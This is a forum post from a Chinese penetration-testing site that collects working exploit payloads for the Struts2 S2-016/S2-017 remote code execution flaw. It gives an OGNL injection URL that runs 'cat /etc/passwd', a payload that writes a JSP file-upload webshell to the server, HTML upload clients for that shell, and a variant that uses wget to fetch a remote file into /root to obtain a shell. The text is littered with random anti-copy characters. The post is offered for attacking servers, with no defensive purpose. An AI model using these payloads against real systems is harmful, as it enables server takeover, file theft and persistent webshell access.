中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]

作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
* y% q. s9 l" ^7 A3 \/ u3 @& H$ X9 d" P" L. o
喜欢就点一下感谢吧^_^8 F0 |" [0 m. D' O: U3 A
" z7 `1 H5 r$ j' O
带回显命令执行:/ L" [2 f6 J! q1 x6 S9 T

! {3 V7 ]" v( R9 x$ \http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}5 K. x* }6 h# ]4 z* U3 R5 O3 g
$ d7 {  l+ j4 [  M5 X( |

6 }3 L5 V9 ?* L- {% r) [6 \9 K- v; p7 d

- b1 I! n* P5 y8 n7 ?) d6 }
& R( l6 \( R" S5 o6 M( k
8 V# E- t, y9 Y
- G7 `2 _9 s7 y' j9 C爆路径:
* G' l: M' o1 P+ }8 f; E5 j# o
3 j7 c+ Q; s3 z# c8 ehttp://www.example.com/struts2-b ... 8%29.close%28%29%7D3 M3 o& V$ V% I0 L& O* K  c
6 {  {+ R) J: R. `6 e: X
; q4 o3 H6 A* |/ ?" [5 z

  S0 @' A4 H/ A6 _4 A9 B6 t: Z/ p" Y+ s
9 V8 T: C) Y1 ?' \
0 ~5 t+ o" ?0 W/ J& ~写文件:
6 [8 X( t5 l. J( g" C. o
( o' [  q3 x) w- K8 A! t9 ohttp://www.example.com/struts2-blank/example/X.action?redirect:${
& ~5 b% G) B% X% O+ @7 O' |% Z/ Y& R7 L* M9 u7 F
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),+ H! I4 x8 U: k" s# E  C

8 P3 Z# Y( d7 o7 t) y. B- R, x%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),7 r0 a9 r, f4 Y8 m
2 M- s, y; S7 q
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
  _- L. ?3 z% T: e7 M. R# H3 L/ a1 H" h
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
; c/ r$ Y9 F( \/ ^! ^0 W6 d) [* j- p: @
0 A* k: b$ z  i. ]: T- [& S9 O
$ i. _' t) I5 P9 M, M3 j
写入的文件内容:' J. k6 e+ y0 \' L1 h
6 l  y; k! v1 [: ~$ z. {8 `+ I) s
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      6 A# E1 X- i! `8 A: p/ _. F9 j
5 S+ x5 F9 i; d- m( L' ]: a+ }
其实就是一个jsp的小马,需要客户端配合                                                                                 
* |7 b# k" J) a' c  G
5 G! [$ h; R1 Q3 V函数f是文件名,t是内容
) Z+ b  m1 t$ m- |1 U* a8 ^
$ i$ n4 \: |* ?3 b客户端:0 S8 L- {1 O' Y+ a% o) T+ d

  G1 R1 o' V  T& j. ]4 j$ A2 e<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
" V& s% o( H7 c+ e% K1 W! N. M2 K% n8 A: G( ^8 \
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
+ u0 Y6 [& e* n6 z; W
& T. M. g6 s) b) o+ n$ b/ E+ V<center>( f, R# Q, @( [
5 ^# i: X$ P6 H& C% B3 m/ _

9 K5 o( {- N# i; s4 k, _0 B
$ k" ?6 j& M9 i( i' V& O, E<input type=submit value="提交">% r, h6 s: E' ?  V; T' ]! Y: Z
3 f6 N5 C" n/ q9 q* p( ^
</form>
* W+ _; r+ L3 \2 @; ]* F, K
- S4 X2 S" j6 ]; f6 |就在当前目录建立一个fjp.jsp
5 [# z# k- ^" j5 {8 j; V
& a8 V' p& P% A5 J6 e7 C* yshell:http://www.example.com/struts2-blank/example/fjp.jsp
% j* m0 O; Z5 P5 Z7 T8 H" t0 M+ {0 }6 q/ `$ w& x
" X+ ]0 W- E0 j  ]" `
% P& c+ T: ?- r. S
还有@园长的一个客户端:- n. a/ D" d5 ~  q2 E! l

) M% a! c8 X' f& i: v6 N; ?9 m& j% ?<html>9 g$ b7 H: Y3 d1 a
$ F  m7 R: A$ [) j  W
<head>
4 ~/ a$ _6 ?1 b4 D' R7 v2 q9 G' I4 `8 o& y+ k
<meta http-equiv="content-type" content="text/html;charset=utf-8">
! s5 H4 W- U7 w( g. n# Y) a. \- S: e: \3 d+ c. p5 |9 u7 W. k
<title>jsp-园长</title>/ ^$ k, Z8 }6 T' o
7 n$ q2 Q1 H9 x7 Q2 V6 f# J
</head>, E3 [+ R& Q; S3 _% E( z4 p
- |7 D) V, z$ G; K
<style>1 e* Q; d* l+ Y0 Z# ]' o4 q) w

0 Q- G7 P3 Z4 ?9 {; F/ t( M9 N  v: F.main{width:980px;height:600px;margin:0 auto;}
) L1 s4 Y- L4 i  R# K# }
0 Y3 x. R1 E4 d- n1 s( C.url{width:300px;}
7 Y7 h- Z% E7 E0 G7 W. j& `* z8 r7 V5 e8 H8 O
.fn{width:60px;}
. A1 l* g' d/ E) J1 M; W0 U7 H' f% s. H0 A8 K3 ]
.content{width:80%;height:60%;}
1 [: G% q( o# |- y
/ D' O% G5 q, [. A; h4 m  L3 S6 h</style>
/ l/ \- J! z  @( R
0 t! Q. t, {. R2 N<script>
2 d. M* I* F' D0 q9 q' p  J: C, L+ A3 N; f4 B
  function upload(){
, q# c  P; W- q1 T8 d
: E! {3 \. r( A/ S. D/ F! P8 y    var url = document.getElementById('url').value,2 u4 {6 B5 d0 W
* W  ~! N7 N8 L
      content = document.getElementById('content').value,
% N% v* R" B3 ?0 B
* g& T) i+ P9 ~- t7 F      fileName = document.getElementById('fn').value,: `, v: P3 Q/ f; j0 Y/ d: E
" B# s+ b# N( I2 V: p( d0 Z! g) B
      form = document.getElementById('fm');9 }# e4 Y/ ^; Q+ s5 e- }8 x, l

5 I' y- o2 M; Z1 V0 a+ h9 |    if(url.length == 0){
( |2 \, v* C8 v* R, y
! A' {, _& h; A" O/ L# x      alert("Url not allowd empty!");
6 f! V' P( ?* n5 `: t3 J! ?
: K8 e$ y" W8 I2 b, r      return ;
' o' r! d& g; K; h- ~+ U, r2 e* Z1 ^" z8 w9 T6 ~6 M- M( m
    }* F, E9 L' e  K4 J  N, \

3 ~; ^  ~; Z* q& R    if(content.length == 0){' k0 ?7 t  K6 o% Y2 s3 h
& X/ Z0 m* I7 O# I' b/ G
      alert("Content not allowd empty!");
# [: ~+ d# `" t# |( g' X' b
6 D% A- [2 ^. h, |0 M! K( i      return ;4 S* F& o/ L( \

' Y; I2 J7 t7 T' H- ], N    }. q: C& c$ @/ V, C- N
  F) w3 |, m* {' z9 j- a
    if(fileName.length == 0){" ~* V2 x2 Q* c3 J) |

+ o4 ?2 `- G! B; W4 t- p      alert("FileName not allowd empty!");
6 z1 m& u- V6 |. ^8 \" p* W7 J- f% c: K
      return ;4 _9 D2 f, |1 n% x4 w6 ?" G

0 H- t2 W( J" w, L    }# H2 u+ M5 I; s; A+ U( y
% d2 |6 z4 H. j) y5 ?3 Q
    form.action = url;3 D" j0 l1 ?2 d
4 ~: \& `$ e+ B7 T
    form.submit();
8 I( @' ]  e, l1 k; `) D) n1 ^! d3 F
  }3 v- ^9 N6 F  _
4 |) v: r+ S# v9 X( n$ D% Q
</script>
' H7 B+ T- v& l$ R2 y5 f( {7 @2 Z5 h3 v  F/ Q, Z1 j
<body>
1 U; p! J, u3 }7 v, s- I6 \2 o! S; @- }/ C: E* u5 q
<div class="main">
! b+ {' {* J/ U0 {
  N7 w; L) F' k% F. Z  <form id="fm" method="post">  . _4 w4 z& k) c

3 _/ x7 N0 \. _! a  x    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
# i$ S- w& ~/ n; r. z! T: t- D( N5 h% e9 K0 f1 Q! k
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  ! s/ a8 ]+ J$ h* u7 k8 K

' p, ?0 @) N  h0 @% j, T    <a href="javascript:upload();">Upload</a>* F. `' b" g6 C
- m# d; Z7 I5 W; ?" a

* B8 ^# O: @; ?5 V8 D1 ?# \4 Y- x( o0 k9 z
    <textarea id="content" class="content" name="t" ></textarea>
3 ?( ]( N/ n/ U! x, e3 c0 ]" m7 D: @) I& ~( V, G
  </form>: \( F$ ^+ B9 i6 y: z

+ z1 H1 v& [% B8 i</div>/ k( {% }6 x( v. y9 a: ]

- Z+ N! G& B) P1 ]</body>* |1 V% B+ P% f- j9 \' f8 `! s
& P% z- A  e& @6 M2 X) }
</html>
5 k' f' H1 V8 j3 y% {# S* ?% ~, ?1 p  m; W; g" x& b% Y8 ?" }

$ Y1 A& {5 F% G% C3 m7 |; p  F: t
还有@X发的一个wget的getshell, D. A0 e* t2 t5 M- j
( I* X% R" R$ R1 d) _, \
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}5 P8 J6 O* Z4 q0 k$ t

3 ?+ P# \( E5 Y' t) L4 @" b)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
% p+ Q6 n" Z5 n9 ^; ]& R复制代码




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2